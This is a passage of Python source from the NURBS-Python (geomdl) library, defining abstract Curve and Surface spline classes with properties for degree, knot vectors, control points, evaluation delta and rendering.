evaluator(self, value): if not isinstance(value, AbstractEvaluator): raise TypeError("The evaluator must be an instance of AbstractEvaluator") value._span_func = self._span_func self._evaluator = value @property def vis(self): """ Visualization component. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the visualization component :setter: Sets the visualization component :type: vis.VisAbstract """ return self._vis_component @vis.setter def vis(self, value): if not isinstance(value, vis.VisAbstract): warnings.warn("Visualization component is NOT an instance of VisAbstract class") return self._vis_component = value def set_ctrlpts(self, ctrlpts, *args, **kwargs): """ Sets control points and checks if the data is consistent. This method is designed to provide a consistent way to set control points whether they are weighted or not. It directly sets the control points member of the class, and therefore it doesn't return any values. The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates will be an array of 3 elements representing *(x, y, z)* coordinates. Keyword Arguments: * ``array_init``: initializes the control points array in the instance * ``array_check_for``: defines the types for input validation * ``callback``: defines the callback function for processing input points * ``dimension``: defines the spatial dimension of the input points :param ctrlpts: input control points as a list of coordinates :type ctrlpts: list :param args: number of control points corresponding to each parametric dimension :type args: tuple """ def validate_and_clean(pts_in, check_for, dimension, pts_out, **kws): for idx, cpt in enumerate(pts_in): if not isinstance(cpt, check_for): raise ValueError("Element number " + str(idx) + " is not a valid input") if len(cpt) != dimension: raise ValueError("The input must be " + str(self._dimension) + " dimensional list - " + str(cpt) + " is not a valid control point") # Convert to list of floats pts_out[idx] = [float(coord) for coord in cpt] return pts_out # Argument validation if len(args) == 0: args = [len(ctrlpts)] if len(args) != self._pdim: raise ValueError("Number of arguments after ctrlpts must be " + str(self._pdim)) # Keyword arguments array_init = kwargs.get('array_init', [[] for _ in range(len(ctrlpts))]) array_check_for = kwargs.get('array_check_for', (list, tuple)) callback_func = kwargs.get('callback', validate_and_clean) self._dimension = kwargs.get('dimension', len(ctrlpts[0])) # Pop existing keywords from kwargs dict existing_kws = ['array_init', 'array_check_for', 'callback', 'dimension'] for ekw in existing_kws: if ekw in kwargs: kwargs.pop(ekw) # Set control points and sizes self._control_points = callback_func(ctrlpts, array_check_for, self._dimension, array_init, **kwargs) self._control_points_size = [int(arg) for arg in args] @abc.abstractmethod def render(self, **kwargs): """ Abstract method for spline rendering and visualization. .. note:: This is an abstract method and it must be implemented in the subclass. """ pass @six.add_metaclass(abc.ABCMeta) class Curve(SplineGeometry): """ Abstract base class for defining spline curves. Curve ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using ``six`` to set metaclass allows users to use the abstract classes in a correct way. The abstract base classes in this module are implemented using a feature called Python Properties. This feature allows users to use some of the functions as if they are class fields. You can also consider properties as a pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of these properties. The Curve ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func`` keyword as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the FindSpan function in the ``helpers`` module. You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details. Code segment below illustrates a possible implementation of Curve abstract base class: .. code-block:: python :linenos: from geomdl import abstract class MyCurveClass(abstract.Curve): def __init__(self, **kwargs): super(MyCurveClass, self).__init__(**kwargs) # Add your constructor code here def evaluate(self, **kwargs): # Implement this function pass def evaluate_single(self, uv): # Implement this function pass def evaluate_list(self, uv_list): # Implement this function pass def derivatives(self, u, v, order, **kwargs): # Implement this function pass The properties and functions defined in the abstract base class will be automatically available in the subclasses. **Keyword Arguments:** * ``precision``: number of decimal places to round to. *Default: 18* * ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True* * ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear` """ def __init__(self, **kwargs): self._pdim = 1 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions self._dinit = 0.01 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value self._array_type = list if not hasattr(self, '_array_type') else self._array_type super(Curve, self).__init__(**kwargs) # Call parent function self._name = "Curve" # descriptor field @property def order(self): """ Order. Defined as ``order = degree + 1`` Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the order :setter: Sets the order :type: int """ return self.degree + 1 @order.setter def order(self, value): self.degree = value - 1 @property def degree(self): """ Degree. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the degree :setter: Sets the degree :type: int """ return self._degree[0] @degree.setter def degree(self, value): val = int(value) if val < 0: raise ValueError("Degree cannot be less than zero") # Clean up the curve points list self.reset(evalpts=True) # Set degree self._degree[0] = val @property def knotvector(self): """ Knot vector. The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True`` argument. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the knot vector :setter: Sets the knot vector :type: list """ return self._knot_vector[0] @knotvector.setter def knotvector(self, value): if self.degree == 0 or self._control_points is None or len(self._control_points) == 0: raise ValueError("Set degree and control points first") # Check knot vector validity if not utilities.check_knot_vector(self.degree, value, len(self._control_points)): raise ValueError("Input is not a valid knot vector") # Clean up the curve points lists self.reset(evalpts=True) # Set knot vector self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \ if self._kv_normalize else value @property def ctrlpts(self): """ Control points. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the control points :setter: Sets the control points :type: list """ return self._control_points @ctrlpts.setter def ctrlpts(self, value): self.set_ctrlpts(value) @property def sample_size(self): """ Sample size. Sample size defines the number of evaluated points to generate. It also sets the ``delta`` property. The following figure illustrates the working principles of sample size property: .. math:: \\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}} Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size :setter: Sets sample size :type: int """ return int(1.0 / self.delta) + 1 @sample_size.setter def sample_size(self, value): if not isinstance(value, int): raise ValueError("Sample size must be an integer value") if self.knotvector is None or len(self.knotvector) == 0 or self.degree == 0: warnings.warn("Cannot determine the delta value. Please set knot vector and degree before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start = self.knotvector[self.degree] stop = self.knotvector[-(self.degree+1)] # Set delta value self.delta = (stop - start) / float(value - 1) @property def delta(self): """ Evaluation delta. Evaluation delta corresponds to the *step size* while ``evaluate`` function iterates on the knot vector to generate curve points. Decreasing step size results in generation of more curve points. Therefore; smaller the delta value, smoother the curve. The following figure illustrates the working principles of the delta property: .. math:: \\left[{{u_{start}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right] Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the delta value :setter: Sets the delta value :type: float """ return self._delta[0] @delta.setter def delta(self, value): # Delta value for surface evaluation should be between 0 and 1 if float(value) <= 0 or float(value) >= 1: raise ValueError("Curve evaluation delta should be between 0.0 and 1.0") # Clean up the curve points list self.reset(evalpts=True) # Set new delta value self._delta[0] = float(value) @property def data(self): """ Returns a dictionary containing all shape data. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. """ return dict( rational=self.rational, dimension=self.dimension, degree=self._degree, knotvector=self._knot_vector, size=[self.ctrlpts_size], control_points=self._control_points ) def set_ctrlpts(self, ctrlpts, *args, **kwargs): """ Sets control points and checks if the data is consistent. This method is designed to provide a consistent way to set control points whether they are weighted or not. It directly sets the control points member of the class, and therefore it doesn't return any values. The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates will be an array of 3 elements representing *(x, y, z)* coordinates. :param ctrlpts: input control points as a list of coordinates :type ctrlpts: list """ # It is not necessary to input args for curves if not args: args = [len(ctrlpts)] # Validate input for arg, degree in zip(args, self._degree): if degree <= 0: raise ValueError("Set the degree first") if arg < degree + 1: raise ValueError("Number of control points should be at least degree + 1") # Clean up the curve and control points lists self.reset(ctrlpts=True, evalpts=True) # Call parent function super(Curve, self).set_ctrlpts(ctrlpts, **kwargs) def render(self, **kwargs): """ Renders the curve using the visualization component The visualization component must be set using :py:attr:`~vis` property before calling this method. Keyword Arguments: * ``cpcolor``: sets the color of the control points polygon * ``evalcolor``: sets the color of the curve * ``bboxcolor``: sets the color of the bounding box * ``filename``: saves the plot with the input name * ``plot``: controls plot window visibility. *Default: True* * ``animate``: activates animation (if supported). *Default: False* * ``extras``: adds line plots to the figure. *Default: None* ``plot`` argument is useful when you would like to work on the command line without any window context. If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the configuration class. ``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts in the format described below: .. code-block:: python :linenos: [ dict( # line plot 1 points=[[1, 2, 3], [4, 5, 6]], # list of points name="My line Plot 1", # name displayed on the legend color="red", # color of the line plot size=6.5 # size of the line plot ), dict( # line plot 2 points=[[7, 8, 9], [10, 11, 12]], # list of points name="My line Plot 2", # name displayed on the legend color="navy", # color of the line plot size=12.5 # size of the line plot ) ] """ if not self._vis_component: warnings.warn("No visualization component has been set") return cpcolor = kwargs.get('cpcolor', 'blue') evalcolor = kwargs.get('evalcolor', 'black') bboxcolor = kwargs.get('bboxcolor', 'darkorange') filename = kwargs.get('filename', None) plot_visible = kwargs.get('plot', True) extra_plots = kwargs.get('extras', None) animate_plot = kwargs.get('animate', False) # Check all parameters are set self._check_variables() # Check if the curve has been evaluated if self._eval_points is None or len(self._eval_points) == 0: self.evaluate() # Clear the visualization component self._vis_component.clear() # Control points self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts') # Evaluated points self._vis_component.add(ptsarr=self.evalpts, name=self.name, color=evalcolor, plot_type='evalpts') # Bounding box self._vis_component.add(ptsarr=self.bbox, name="Bounding Box", color=bboxcolor, plot_type='bbox') # User-defined plots if extra_plots is not None: for ep in extra_plots: self._vis_component.add(ptsarr=ep['points'], name=ep['name'], color=(ep['color'], ep['size']), plot_type='extras') # Data requested by the visualization module if self._vis_component.mconf['others']: vis_other = self._vis_component.mconf['others'].split(",") for vo in vis_other: vo_clean = vo.strip() # Send center point of the parametric space to the visualization module if vo_clean == "midpt": midprm = (max(self.knotvector) + min(self.knotvector)) / 2.0 midpt = self.evaluate_single(midprm) self._vis_component.add(ptsarr=[midpt], plot_type=vo_clean) # Display the figure if animate_plot: self._vis_component.animate(fig_save_as=filename, display_plot=plot_visible) else: self._vis_component.render(fig_save_as=filename, display_plot=plot_visible) def reset(self, **kwargs): """ Resets control points and/or evaluated points. Keyword Arguments: * ``evalpts``: if True, then resets evaluated points * ``ctrlpts`` if True, then resets control points """ reset_ctrlpts = kwargs.get('ctrlpts', False) reset_evalpts = kwargs.get('evalpts', False) if reset_ctrlpts: self._control_points = self._init_array() self._bounding_box = self._init_array() if reset_evalpts: self._eval_points = self._init_array() # Checks whether the curve evaluation is possible or not def _check_variables(self): works = True param_list = [] if self.degree == 0: works = False param_list.append('degree') if self._control_points is None or len(self._control_points) == 0: works = False param_list.append('ctrlpts') if self.knotvector is None or len(self.knotvector) == 0: works = False param_list.append('knotvector') if not works: raise ValueError("Please set the following variables before evaluation: " + ",".join(param_list)) @abc.abstractmethod def evaluate(self, **kwargs): """ Evaluates the curve. .. note:: This is an abstract method and it must be implemented in the subclass. """ # Check all parameters are set before the curve evaluation self._check_variables() @abc.abstractmethod def evaluate_single(self, param): """ Evaluates the curve at the given parameter. .. note:: This is an abstract method and it must be implemented in the subclass. :param param: parameter (u) """ # Check all variables are set before the evaluation self._check_variables() if isinstance(param, (int, float)): param = [float(param) for _ in range(self.pdimension)] # Check parameters if self._kv_normalize: if not utilities.check_params(param): raise GeomdlException("Parameters should be between 0 and 1") @abc.abstractmethod def evaluate_list(self, param_list): """ Evaluates the curve for an input range of parameters. .. note:: This is an abstract method and it must be implemented in the subclass. :param param_list: array of parameters """ # Check all parameters are set before the evaluation self._check_variables() @abc.abstractmethod def derivatives(self, u, order, **kwargs): """ Evaluates the derivatives of the curve at parameter u. .. note:: This is an abstract method and it must be implemented in the subclass. :param u: parameter (u) :type u: float :param order: derivative order :type order: int """ # Check all variables are set before the curve evaluation self._check_variables() # Check parameters if self._kv_normalize: if not utilities.check_params([u]): raise GeomdlException("Parameters should be between 0 and 1") @six.add_metaclass(abc.ABCMeta) class Surface(SplineGeometry): """ Abstract base class for defining spline surfaces. Surface ABC is inherited from abc.ABCMeta class which is included in Python standard library by default. Due to differences between Python 2 and 3 on defining a metaclass, the compatibility module ``six`` is employed. Using ``six`` to set metaclass allows users to use the abstract classes in a correct way. The abstract base classes in this module are implemented using a feature called Python Properties. This feature allows users to use some of the functions as if they are class fields. You can also consider properties as a pythonic way to set getters and setters. You will see "getter" and "setter" descriptions on the documentation of these properties. The Surface ABC allows users to set the *FindSpan* function to be used in evaluations with ``find_span_func`` keyword as an input to the class constructor. NURBS-Python includes a binary and a linear search variation of the FindSpan function in the ``helpers`` module. You may also implement and use your own *FindSpan* function. Please see the ``helpers`` module for details. Code segment below illustrates a possible implementation of Surface abstract base class: .. code-block:: python :linenos: from geomdl import abstract class MySurfaceClass(abstract.Surface): def __init__(self, **kwargs): super(MySurfaceClass, self).__init__(**kwargs) # Add your constructor code here def evaluate(self, **kwargs): # Implement this function pass def evaluate_single(self, uv): # Implement this function pass def evaluate_list(self, uv_list): # Implement this function pass def derivatives(self, u, v, order, **kwargs): # Implement this function pass The properties and functions defined in the abstract base class will be automatically available in the subclasses. **Keyword Arguments:** * ``precision``: number of decimal places to round to. *Default: 18* * ``normalize_kv``: if True, knot vector(s) will be normalized to [0,1] domain. *Default: True* * ``find_span_func``: default knot span finding algorithm. *Default:* :func:`.helpers.find_span_linear` """ def __init__(self, **kwargs): self._pdim = 2 if not hasattr(self, '_pdim') else self._pdim # number of parametric directions self._dinit = 0.05 if not hasattr(self, '_dinit') else self._dinit # evaluation delta init value self._array_type = list if not hasattr(self, '_array_type') else self._array_type super(Surface, self).__init__(**kwargs) self._name = "Surface" # descriptor field self._tsl_component = None # tessellation component self._trims = self._init_array() # trim curves @property def order_u(self): """ Order for the u-direction. Defined as ``order = degree + 1`` Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets order for the u-direction :setter: Sets order for the u-direction :type: int """ return self.degree_u + 1 @order_u.setter def order_u(self, value): self.degree_u = value - 1 @property def order_v(self): """ Order for the v-direction. Defined as ``order = degree + 1`` Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets surface order for the v-direction :setter: Sets surface order for the v-direction :type: int """ return self.degree_v + 1 @order_v.setter def order_v(self, value): self.degree_v = value - 1 @property def degree(self): """ Degree for u- and v-directions :getter: Gets the degree :setter: Sets the degree :type: list """ return self._degree @degree.setter def degree(self, value): if not isinstance(value, (list, tuple)): raise ValueError("Please input a list with a length of " + str(self.pdimension)) self.degree_u = value[0] self.degree_v = value[1] @property def degree_u(self): """ Degree for the u-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets degree for the u-direction :setter: Sets degree for the u-direction :type: int """ return self._degree[0] @degree_u.setter def degree_u(self, value): val = int(value) if val <= 0: raise ValueError("Degree cannot be less than zero") # Clean up the surface points self.reset(evalpts=True) # Set degree u self._degree[0] = int(value) @property def degree_v(self): """ Degree for the v-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets degree for the v-direction :setter: Sets degree for the v-direction :type: int """ return self._degree[1] @degree_v.setter def degree_v(self, value): val = int(value) if val <= 0: raise ValueError("Degree cannot be less than zero") # Clean up the surface points self.reset(evalpts=True) # Set degree v self._degree[1] = val @property def knotvector(self): """ Knot vector for u- and v-directions :getter: Gets the knot vector :setter: Sets the knot vector :type: list """ return self._knot_vector @knotvector.setter def knotvector(self, value): if not isinstance(value, (list, tuple)): raise ValueError("Please input a list with a length of " + str(self.pdimension)) self.knotvector_u = value[0] self.knotvector_v = value[1] @property def knotvector_u(self): """ Knot vector for the u-direction. The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True`` argument. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets knot vector for the u-direction :setter: Sets knot vector for the u-direction :type: list """ return self._knot_vector[0] @knotvector_u.setter def knotvector_u(self, value): if self.degree_u == 0 or self.ctrlpts_size_u == 0: raise ValueError("Set degree and control points first for the u-direction") # Check knot vector validity if not utilities.check_knot_vector(self.degree_u, value, self.ctrlpts_size_u): raise ValueError("Input is not a valid knot vector for the u-direction") # Clean up the surface points self.reset(evalpts=True) # Set knot vector self._knot_vector[0] = utilities.normalize_knot_vector(value, decimals=self._precision) \ if self._kv_normalize else value @property def knotvector_v(self): """ Knot vector for the v-direction. The knot vector will be normalized to [0, 1] domain if the class is initialized with ``normalize_kv=True`` argument. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets knot vector for the v-direction :setter: Sets knot vector for the v-direction :type: list """ return self._knot_vector[1] @knotvector_v.setter def knotvector_v(self, value): if self.degree_v == 0 or self.ctrlpts_size_v == 0: raise ValueError("Set degree and control points first for the v-direction") # Check knot vector validity if not utilities.check_knot_vector(self.degree_v, value, self.ctrlpts_size_v): raise ValueError("Input is not a valid knot vector for the v-direction") # Clean up the surface points self.reset(evalpts=True) # Set knot vector self._knot_vector[1] = utilities.normalize_knot_vector(value, decimals=self._precision) \ if self._kv_normalize else value @property def ctrlpts(self): """ 1-dimensional array of control points. .. note:: The v index varies first. That is, a row of v control points for the first u value is found first. Then, the row of v control points for the next u value. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the control points :setter: Sets the control points :type: list """ return self._control_points @ctrlpts.setter def ctrlpts(self, value): if self.ctrlpts_size_u <= 0 or self.ctrlpts_size_v <= 0: raise ValueError("Please set the number of control points on the u- and v-directions") self.set_ctrlpts(value, self.ctrlpts_size_u, self.ctrlpts_size_v) @property def ctrlpts_size_u(self): """ Number of control points for the u-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets number of control points for the u-direction :setter: Sets number of control points for the u-direction """ return self._control_points_size[0] @ctrlpts_size_u.setter def ctrlpts_size_u(self, value): if not isinstance(value, int): raise TypeError("Number of control points for the u-direction must be an integer number") if value <= 0: raise ValueError("Control points size cannot be less than and equal to zero") # Assume that user is doing this right self._control_points_size[0] = value @property def ctrlpts_size_v(self): """ Number of control points for the v-direction. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets number of control points on the v-direction :setter: Sets number of control points on the v-direction """ return self._control_points_size[1] @ctrlpts_size_v.setter def ctrlpts_size_v(self, value): if not isinstance(value, int): raise TypeError("Number of control points on the v-direction must be an integer number") if value <= 0: raise ValueError("Control points size cannot be less than and equal to zero") # Assume that user is doing this right self._control_points_size[1] = value @property def sample_size_u(self): """ Sample size for the u-direction. Sample size defines the number of surface points to generate. It also sets the ``delta_u`` property. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size for the u-direction :setter: Sets sample size for the u-direction :type: int """ return int(1.0 / self.delta_u) + 1 @sample_size_u.setter def sample_size_u(self, value): if not isinstance(value, int): raise ValueError("Sample size must be an integer value") if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0: warnings.warn("Cannot determine 'delta_u' value. Please set knot vectors and degrees before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start_u = self.knotvector_u[self.degree_u] stop_u = self.knotvector_u[-(self.degree_u+1)] # Set delta values self.delta_u = (stop_u - start_u) / float(value - 1) @property def sample_size_v(self): """ Sample size for the v-direction. Sample size defines the number of surface points to generate. It also sets the ``delta_v`` property. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size for the v-direction :setter: Sets sample size for the v-direction :type: int """ return int(1.0 / self.delta_v) + 1 @sample_size_v.setter def sample_size_v(self, value): if not isinstance(value, int): raise ValueError("Sample size must be an integer value") if (self.knotvector_v is None or len(self.knotvector_v) == 0) or self.degree_v == 0: warnings.warn("Cannot determine 'delta_v' value. Please set knot vectors and degrees before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start_v = self.knotvector_v[self.degree_v] stop_v = self.knotvector_v[-(self.degree_v+1)] # Set delta values self.delta_v = (stop_v - start_v) / float(value - 1) @property def sample_size(self): """ Sample size for both u- and v-directions. Sample size defines the number of surface points to generate. It also sets the ``delta`` property. The following figure illustrates the working principles of sample size property: .. math:: \\underbrace {\\left[ {{u_{start}}, \\ldots ,{u_{end}}} \\right]}_{{n_{sample}}} Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets sample size as a tuple of values corresponding to u- and v-directions :setter: Sets sample size for both u- and v-directions :type: int """ sample_size_u = int(1.0 / self.delta_u) + 1 sample_size_v = int(1.0 / self.delta_v) + 1 return sample_size_u, sample_size_v @sample_size.setter def sample_size(self, value): if (self.knotvector_u is None or len(self.knotvector_u) == 0) or self.degree_u == 0 or\ (self.knotvector_v is None or len(self.knotvector_v) == 0 or self.degree_v == 0): warnings.warn("Cannot determine 'delta' value. Please set knot vectors and degrees before sample size.") return # To make it operate like linspace, we have to know the starting and ending points. start_u = self.knotvector_u[self.degree_u] stop_u = self.knotvector_u[-(self.degree_u+1)] start_v = self.knotvector_v[self.degree_v] stop_v = self.knotvector_v[-(self.degree_v+1)] # Set delta values self.delta_u = (stop_u - start_u) / float(value - 1) self.delta_v = (stop_v - start_v) / float(value - 1) @property def delta_u(self): """ Evaluation delta for the u-direction. Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to generate surface points. Decreasing step size results in generation of more surface points. Therefore; smaller the delta value, smoother the surface. Please note that ``delta_u`` and ``sample_size_u`` properties correspond to the same variable with different descriptions. Therefore, setting ``delta_u`` will also set ``sample_size_u``. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets evaluation delta for the u-direction :setter: Sets evaluation delta for the u-direction :type: float """ return self._delta[0] @delta_u.setter def delta_u(self, value): # Delta value for surface evaluation should be between 0 and 1 if float(value) <= 0 or float(value) >= 1: raise ValueError("Surface evaluation delta (u-direction) must be between 0.0 and 1.0") # Clean up the surface points self.reset(evalpts=True) # Set new delta value self._delta[0] = float(value) @property def delta_v(self): """ Evaluation delta for the v-direction. Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to generate surface points. Decreasing step size results in generation of more surface points. Therefore; smaller the delta value, smoother the surface. Please note that ``delta_v`` and ``sample_size_v`` properties correspond to the same variable with different descriptions. Therefore, setting ``delta_v`` will also set ``sample_size_v``. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets evaluation delta for the v-direction :setter: Sets evaluation delta for the v-direction :type: float """ return self._delta[1] @delta_v.setter def delta_v(self, value): # Delta value for surface evaluation should be between 0 and 1 if float(value) <= 0 or float(value) >= 1: raise ValueError("Surface evaluation delta (v-direction) should be between 0.0 and 1.0") # Clean up the surface points self.reset(evalpts=True) # Set new delta value self._delta[1] = float(value) @property def delta(self): """ Evaluation delta for both u- and v-directions. Evaluation delta corresponds to the *step size* while ``evaluate()`` function iterates on the knot vector to generate surface points. Decreasing step size results in generation of more surface points. Therefore; smaller the delta value, smoother the surface. Please note that ``delta`` and ``sample_size`` properties correspond to the same variable with different descriptions. Therefore, setting ``delta`` will also set ``sample_size``. The following figure illustrates the working principles of the delta property: .. math:: \\left[{{u_{0}},{u_{start}} + \\delta ,({u_{start}} + \\delta ) + \\delta , \\ldots ,{u_{end}}} \\right] Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets evaluation delta as a tuple of values corresponding to u- and v-directions :setter: Sets evaluation delta for both u- and v-directions :type: float """ return self.delta_u, self.delta_v @delta.setter def delta(self, value): if isinstance(value, (int, float)): self.delta_u = value self.delta_v = value elif isinstance(value, (list, tuple)): if len(value) == 2: self.delta_u = value[0] self.delta_v = value[1] else: raise ValueError("Surface requires 2 delta values") else: raise ValueError("Cannot set delta. Please input a numeric value or a list or tuple with 2 numeric values") @property def tessellator(self): """ Tessellation component. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the tessellation component :setter: Sets the tessellation component """ return self._tsl_component @tessellator.setter def tessellator(self, value): if not isinstance(value, AbstractTessellate): warnings.warn("Tessellation component must be an instance of AbstractTessellate class") return self._tsl_component = value @property def trims(self): """ Trim curves. Trim curves are introduced to the surfaces on the parametric space. It should be an array (or list, tuple, etc.) and they are integrated to the existing visualization system. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. :getter: Gets the array of trim curves :setter: Sets the array of trim curves """ return self._trims @trims.setter def trims(self, value): # Input validity check for i, v in enumerate(value): if not isinstance(v, Geometry): raise GeomdlException( "Trim curve must be an instance of abstract.Geometry class", data=dict(idx=i) ) self._trims = value @property def data(self): """ Returns a dictionary containing all shape data. Please refer to the `wiki <https://github.com/orbingol/NURBS-Python/wiki/Using-Python-Properties>`_ for details on using this class member. """ return dict( rational=self.rational, dimension=self.dimension, degree=self._degree, knotvector=self._knot_vector, size=self._control_points_size, control_points=self._control_points ) def set_ctrlpts(self, ctrlpts, *args, **kwargs): """ Sets the control points and checks if the data is consistent. This method is designed to provide a consistent way to set control points whether they are weighted or not. It directly sets the control points member of the class, and therefore it doesn't return any values. The input will be an array of coordinates. If you are working in the 3-dimensional space, then your coordinates will be an array of 3 elements representing *(x, y, z)* coordinates. .. note:: The v index varies first. That is, a row of v control points for the first u value is found first. Then, the row of v control points for the next u value. :param ctrlpts: input control points as a list of coordinates :type ctrlpts: list :param args: number of control points corresponding to each parametric dimension :type args: tuple[int, int] """ # Validate input for arg, degree in zip(args, self._degree): if degree <= 0: raise ValueError("Set the degree first") if arg < degree + 1: raise ValueError("Number of control points should be at least degree + 1") # Clean up the surface and control points self.reset(evalpts=True, ctrlpts=True) # Call parent function super(Surface, self).set_ctrlpts(ctrlpts, *args, **kwargs) def render(self, **kwargs): """ Renders the surface using the visualization component. The visualization component must be set using :py:attr:`~vis` property before calling this method. Keyword Arguments: * ``cpcolor``: sets the color of the control points grid * ``evalcolor``: sets the color of the surface * ``trimcolor``: sets the color of the trim curves * ``filename``: saves the plot with the input name * ``plot``: controls plot window visibility. *Default: True* * ``animate``: activates animation (if supported). *Default: False* * ``extras``: adds line plots to the figure. *Default: None* * ``colormap``: sets the colormap of the surface The ``plot`` argument is useful when you would like to work on the command line without any window context. If ``plot`` flag is False, this method saves the plot as an image file (.png file where possible) and disables plot window popping out. If you don't provide a file name, the name of the image file will be pulled from the configuration class. ``extras`` argument can be used to add extra line plots to the figure. This argument expects a list of dicts in the format described below: .. code-block:: python :linenos: [ dict( # line plot 1 points=[[1, 2, 3], [4, 5, 6]], # list of points name="My line Plot 1", # name displayed on the legend color="red", # color of the line plot size=6.5 # size of the line plot ), dict( # line plot 2 points=[[7, 8, 9], [10, 11, 12]], # list of points name="My line Plot 2", # name displayed on the legend color="navy", # color of the line plot size=12.5 # size of the line plot ) ] Please note that ``colormap`` argument can only work with visualization classes that support colormaps. As an example, please see :py:class:`.VisMPL.VisSurfTriangle()` class documentation. This method expects a single colormap input. """ if not self._vis_component: warnings.warn("No visualization component has been set") return cpcolor = kwargs.get('cpcolor', 'blue') evalcolor = kwargs.get('evalcolor', 'green') bboxcolor = kwargs.get('bboxcolor', 'darkorange') trimcolor = kwargs.get('trimcolor', 'black') filename = kwargs.get('filename', None) plot_visible = kwargs.get('plot', True) extra_plots = kwargs.get('extras', None) animate_plot = kwargs.get('animate', False) # Get colormap and convert to a list surf_cmap = kwargs.get('colormap', None) surf_cmap = [surf_cmap] if surf_cmap else [] # Check all parameters are set self._check_variables() # Check if the surface has been evaluated if self._eval_points is None or len(self._eval_points) == 0: self.evaluate() # Clear the visualization component self._vis_component.clear() # Add control points if self._vis_component.mconf['ctrlpts'] == 'points': self._vis_component.add(ptsarr=self.ctrlpts, name="Control Points", color=cpcolor, plot_type='ctrlpts') # Add control points as quads if self._vis_component.mconf['ctrlpts'] == 'quads': ctrlpts_quads = utilities.make_quad(self.ctrlpts, self.ctrlpts_size_u, self.ctrlpts_size_v) self._vis_component.add(ptsarr=ctrlpts_quads, name="Control Points", color=cpcolor, plot_type='ctrlpts') # Add control points as a quad mesh if self._vis_component.mconf['ctrlpts'] == 'quadmesh': ctrlpts_quads = utilities.make_quad_mesh(self.ctrlpts, self.ctrlpts_size_u, self.ctrlpts_size_v) self._vis_component.add(ptsarr=ctrlpts_quads, name="Control Points", color=cpcolor, plot_type='ctrlpts') # Add surface points if self._vis_component.mconf['evalpts'] == 'points': 